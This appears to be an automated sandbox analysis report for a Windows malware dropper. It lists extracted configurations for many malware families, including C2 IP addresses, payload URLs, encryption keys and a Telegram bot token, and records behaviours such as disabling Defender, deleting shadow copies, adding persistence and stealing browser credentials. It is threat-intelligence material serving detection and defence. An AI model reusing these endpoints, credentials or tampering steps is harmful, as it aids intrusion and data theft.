Resubmissions
17-12-2024 13:35
241217-qv6rzs1nhp 1015-11-2024 19:06
241115-xr6q5szdnf 1014-11-2024 23:35
241114-3lfknavfqg 1014-11-2024 23:26
241114-3eysnavfje 1014-11-2024 23:12
241114-26znlavdqq 10Analysis
-
max time kernel
356s -
max time network
459s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
14-11-2024 23:12
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral2
Sample
4363463463464363463463463.exe
Resource
win11-20241007-en
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
phorphiex
http://185.215.113.66
-
mutex
Klipux
Extracted
xworm
91.92.249.37:9049
https://pastebin.com/raw/LWUHVqrD:48602480
aMtkXNimPlkESDx9
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
62.113.117.95:4449
hwelcvbupaqfzors
-
delay
10
-
install
false
-
install_folder
%AppData%
Extracted
vidar
11.3
a770ee12f3b037ae568cfe2254681c7d
https://t.me/asg7rd
https://steamcommunity.com/profiles/76561199794498376
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Extracted
vidar
10.7
1b47b87875b9774afdda9b2528e389d1
https://steamcommunity.com/profiles/76561199751190313
https://t.me/pech0nk
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Extracted
amadey
5.03
7c4393
http://185.215.113.217
-
install_dir
f9c76c1660
-
install_file
corept.exe
-
strings_key
9808a67f01d2f0720518035acbde7521
-
url_paths
/CoreOPT/index.php
Extracted
xred
xred.mooo.com
-
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
http://xred.site50.net/syn/SUpdate.ini
https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
http://xred.site50.net/syn/Synaptics.rar
https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
http://xred.site50.net/syn/SSLLibrary.dll
Extracted
metasploit
windows/reverse_tcp
64.176.38.237:8139
Extracted
xworm
5.0
62.113.117.95:5665
oQNXB2TbsZoFMnfW
-
install_file
USB.exe
Extracted
quasar
1.4.1
Test
193.161.193.99:35184
67.205.154.243:35184
9cabbafb-503b-49f1-ab22-adc756455c10
-
encryption_key
8B93C77AC1C58EA80A3327E9FD26246A79EF3B8E
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
MS Build Tools
-
subdirectory
Microsoft-Build-Tools
Extracted
asyncrat
Venom RAT + HVNC + Receiving + Grabber v6.0.4
NewClient
157.20.182.183:4449
fsqshvwapaxdhwtdp
-
delay
1
-
install
false
-
install_file
Winup.exe
-
install_folder
%AppData%
Extracted
quasar
1.4.1
Office04
73.62.14.5:4782
3aaa11be-d135-4877-a61e-c409c29a7a60
-
encryption_key
BC9162791FD860195CF75664AE64885B64D5B5CE
-
install_name
Client1.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Startup
-
subdirectory
SubDir
Extracted
redline
Logs
185.215.113.9:9137
Extracted
metasploit
metasploit_stager
185.202.113.6:4243
Extracted
gurcu
https://api.telegram.org/bot7382558274:AAFZkCVTgYkuRWqDruBGK0C9eAD8ZoE6BOs/sendMessage?chat_id=966649672
Signatures
-
Amadey family
-
Asyncrat family
-
Detect Vidar Stealer 10 IoCs
resource yara_rule behavioral1/memory/4304-900-0x00000000054B0000-0x00000000057B0000-memory.dmp family_vidar_v7 behavioral1/memory/4304-901-0x00000000054B0000-0x00000000057B0000-memory.dmp family_vidar_v7 behavioral1/memory/4304-902-0x00000000054B0000-0x00000000057B0000-memory.dmp family_vidar_v7 behavioral1/memory/4304-923-0x00000000054B0000-0x00000000057B0000-memory.dmp family_vidar_v7 behavioral1/memory/4304-924-0x00000000054B0000-0x00000000057B0000-memory.dmp family_vidar_v7 behavioral1/memory/3000-937-0x0000000001990000-0x0000000001BD3000-memory.dmp family_vidar_v7 behavioral1/memory/3000-938-0x0000000001990000-0x0000000001BD3000-memory.dmp family_vidar_v7 behavioral1/memory/3000-939-0x0000000001990000-0x0000000001BD3000-memory.dmp family_vidar_v7 behavioral1/memory/3000-952-0x0000000001990000-0x0000000001BD3000-memory.dmp family_vidar_v7 behavioral1/memory/3000-953-0x0000000001990000-0x0000000001BD3000-memory.dmp family_vidar_v7 -
Detect Xworm Payload 8 IoCs
resource yara_rule behavioral1/files/0x002800000004520d-491.dat family_xworm behavioral1/memory/4772-499-0x00000000009D0000-0x00000000009E6000-memory.dmp family_xworm behavioral1/files/0x0028000000045211-515.dat family_xworm behavioral1/memory/3400-523-0x00000000007F0000-0x0000000000804000-memory.dmp family_xworm behavioral1/memory/2816-1166-0x0000000000400000-0x000000000050D000-memory.dmp family_xworm behavioral1/memory/2816-1168-0x0000000000400000-0x000000000050D000-memory.dmp family_xworm behavioral1/files/0x002800000004528c-1185.dat family_xworm behavioral1/memory/1380-1245-0x0000000000A20000-0x0000000000A70000-memory.dmp family_xworm -
Detects Go variant of Hive Ransomware 1 IoCs
resource yara_rule behavioral1/memory/8548-13000-0x0000000000AB0000-0x0000000000D13000-memory.dmp hive_go -
Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
-
Dharma family
-
Gurcu family
-
Hive
A ransomware written in Golang first seen in June 2021.
-
Hive family
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Metasploit family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" def.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" def.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" def.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" def.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" def.exe -
Modifies security service 2 TTPs 4 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" sysmablsvr.exe -
Phorphiex family
-
Phorphiex payload 5 IoCs
resource yara_rule behavioral1/files/0x00040000000447b9-178.dat family_phorphiex behavioral1/files/0x0028000000045205-457.dat family_phorphiex behavioral1/files/0x002800000004520c-480.dat family_phorphiex behavioral1/files/0x0029000000045277-1078.dat family_phorphiex behavioral1/files/0x00270000000453ea-13191.dat family_phorphiex -
Quasar family
-
Quasar payload 5 IoCs
resource yara_rule behavioral1/files/0x00030000000414f4-6705.dat family_quasar behavioral1/memory/9088-9039-0x0000000000A90000-0x0000000000DB4000-memory.dmp family_quasar behavioral1/files/0x0004000000040f48-12432.dat family_quasar behavioral1/memory/6912-12440-0x0000000000350000-0x0000000000674000-memory.dmp family_quasar behavioral1/files/0x002a000000045365-12726.dat family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 6 IoCs
resource yara_rule behavioral1/files/0x00280000000451c5-209.dat family_redline behavioral1/memory/3092-219-0x0000000000E30000-0x0000000000E6E000-memory.dmp family_redline behavioral1/files/0x00280000000453b8-12738.dat family_redline behavioral1/files/0x00310000000453c9-12927.dat family_redline behavioral1/memory/7556-12935-0x0000000000A50000-0x0000000000AA2000-memory.dmp family_redline behavioral1/files/0x0026000000045419-13359.dat family_redline -
Redline family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
description pid Process procid_target PID 4304 created 3540 4304 Organizational.pif 56 PID 1140 created 3540 1140 3036535491.exe 56 PID 1140 created 3540 1140 3036535491.exe 56 PID 5772 created 3540 5772 Jurisdiction.pif 56 PID 5772 created 3540 5772 Jurisdiction.pif 56 PID 5700 created 3540 5700 winupsecvmgr.exe 56 PID 5700 created 3540 5700 winupsecvmgr.exe 56 PID 5700 created 3540 5700 winupsecvmgr.exe 56 PID 4548 created 3540 4548 Councils.pif 56 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reg.exe -
Vidar family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysmablsvr.exe -
Xmrig family
-
Xred family
-
Xworm family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x002c000000045216-858.dat family_asyncrat -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ def.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ random.exe -
Renames multiple (182) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
XMRig Miner payload 13 IoCs
resource yara_rule behavioral1/memory/5700-815-0x00007FF74B4D0000-0x00007FF74BA67000-memory.dmp xmrig behavioral1/memory/1984-834-0x00007FF62C4E0000-0x00007FF62CCCF000-memory.dmp xmrig behavioral1/memory/1984-853-0x00007FF62C4E0000-0x00007FF62CCCF000-memory.dmp xmrig behavioral1/memory/1984-879-0x00007FF62C4E0000-0x00007FF62CCCF000-memory.dmp xmrig behavioral1/memory/1984-884-0x00007FF62C4E0000-0x00007FF62CCCF000-memory.dmp xmrig behavioral1/memory/1984-904-0x00007FF62C4E0000-0x00007FF62CCCF000-memory.dmp xmrig behavioral1/memory/1984-951-0x00007FF62C4E0000-0x00007FF62CCCF000-memory.dmp xmrig behavioral1/memory/1984-974-0x00007FF62C4E0000-0x00007FF62CCCF000-memory.dmp xmrig behavioral1/memory/1984-1109-0x00007FF62C4E0000-0x00007FF62CCCF000-memory.dmp xmrig behavioral1/memory/1984-1137-0x00007FF62C4E0000-0x00007FF62CCCF000-memory.dmp xmrig behavioral1/memory/1984-1147-0x00007FF62C4E0000-0x00007FF62CCCF000-memory.dmp xmrig behavioral1/memory/1984-6471-0x00007FF62C4E0000-0x00007FF62CCCF000-memory.dmp xmrig behavioral1/memory/1984-12178-0x00007FF62C4E0000-0x00007FF62CCCF000-memory.dmp xmrig -
pid Process 5704 powershell.exe 348 powershell.exe 8356 powershell.exe 5192 powershell.exe 5732 powershell.exe 6080 powershell.exe 6388 powershell.exe 9796 powershell.exe 8124 powershell.exe 1236 powershell.exe 4748 powershell.exe 1544 powershell.exe 8984 powershell.exe 8096 powershell.exe 5256 powershell.exe -
Downloads MZ/PE file
-
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 7504 attrib.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files (x86)\\Mesh Agent\\MeshAgent.exe\" " meshagent32-group.exe -
Uses browser remote debugging 2 TTPs 9 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 6212 chrome.exe 10908 chrome.exe 6460 chrome.exe 5492 chrome.exe 8748 chrome.exe 10256 chrome.exe 6160 chrome.exe 9332 chrome.exe 4064 chrome.exe -
.NET Reactor proctector 1 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/memory/11476-12223-0x0000000000E40000-0x0000000002848000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion def.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion def.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion random.exe -
Checks computer location settings 2 TTPs 20 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation ldqj18tn.exe Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation splwow64.exe Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation explorer.exe Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation sysvplervcs.exe Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation first.exe Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation sysklnorbcv.exe Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation Predicted.pif Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation SingerJudy.exe Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation exclude.exe Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation 4363463463464363463463463.exe Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation seo.exe Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation 312026255.exe Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation 41986531.exe Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation 1066112755.exe Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation InfluencedNervous.exe Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation 147585972.exe Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation sysppvrdnvs.exe Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation Organizational.pif Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation 1234230369.exe Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation mshta.exe -
Drops startup file 14 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduCraft.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk explorer.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\first.exe first.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk explorer.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduCraft.url cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\first.exe first.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CoronaVirus.exe CoronaVirus.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url cmd.exe -
Executes dropped EXE 64 IoCs
pid Process 2840 seo.exe 1796 ldqj18tn.exe 3456 s.exe 3092 frap.exe 3000 Predicted.pif 5012 sysvplervcs.exe 4304 Organizational.pif 5288 312026255.exe 5676 391817420.exe 5804 Meeting-https.exe 5992 inst77player_1.0.0.1.exe 5180 tdrpload.exe 2920 o.exe 672 sysppvrdnvs.exe 4772 first.exe 5628 tpeinf.exe 3400 XClient.exe 5652 sysklnorbcv.exe 6100 132069246.exe 5200 splwow64.exe 1140 3036535491.exe 3184 inst77player.exe 5136 41986531.exe 5700 winupsecvmgr.exe 3824 1066112755.exe 5772 Jurisdiction.pif 5624 1342430716.exe 1316 334793917.exe 5940 3084722593.exe 5208 2074828513.exe 4052 XClient_protected.exe 3200 khtoawdltrha.exe 1512 pp.exe 4532 CoronaVirus.exe 1420 Installeraus.exe 4508 meshagent32-group.exe 4664 SingerJudy.exe 2320 MeshAgent.exe 4552 Journal.exe 3780 exclude.exe 6088 tt.exe 3196 sysmablsvr.exe 4548 Councils.pif 1668 1234230369.exe 644 2963921430.exe 1268 BaddStore.exe 5956 msf.exe 1380 ._cache_aspnet_regiis.exe 2208 Synaptics.exe 8128 1975213000.exe 7628 bwapp.exe 6796 av_downloader.exe 6468 2.exe 9088 Client-built.exe 7888 Windows.exe 7304 AV_DOW~1.EXE 9336 Client.exe 11476 explorer.exe 11424 RegAsm.exe 6728 build555.exe 11044 def.exe 7068 pimer_bbbcontents7.exe 2156 pimer_bbbcontents7.exe 6912 Sentil.exe -
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Software\Wine def.exe Key opened \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Software\Wine random.exe -
Loads dropped DLL 62 IoCs
pid Process 5992 inst77player_1.0.0.1.exe 5992 inst77player_1.0.0.1.exe 5992 inst77player_1.0.0.1.exe 4304 Organizational.pif 1268 BaddStore.exe 10712 chrome.exe 10712 chrome.exe 10712 chrome.exe 10712 chrome.exe 10712 chrome.exe 10936 chrome.exe 10936 chrome.exe 10936 chrome.exe 10936 chrome.exe 10936 chrome.exe 9184 chrome.exe 9184 chrome.exe 9184 chrome.exe 7400 chrome.exe 7400 chrome.exe 7400 chrome.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 6200 bot2.exe 7104 wow.exe 7104 wow.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" def.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysmablsvr.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features def.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysmablsvr.exe -
Adds Run key to start application 2 TTPs 10 IoCs
